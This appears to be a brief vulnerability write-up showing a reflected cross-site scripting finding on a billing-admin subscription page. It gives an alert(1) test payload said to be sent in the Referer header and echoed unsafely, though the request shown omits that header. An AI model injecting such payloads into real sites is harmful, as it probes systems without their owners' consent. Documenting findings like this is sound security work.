Real World Example:
Path : /billing-admin/profile/subscription/?l=de
Payload : c5obc’+alert(1)+’p7yd5
Steps to reproduce :
Request Header :
GET /billing-admin/profile/subscription/?l=de HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
The payload c5obc’+alert(1)+’p7yd5 was submitted in the Referer HTTP header. Payload is copied from a request and echoed into the application’s immediate response in an unsafe way.
In the above example the payload reflect back in the response causing the rise of the vulnerability.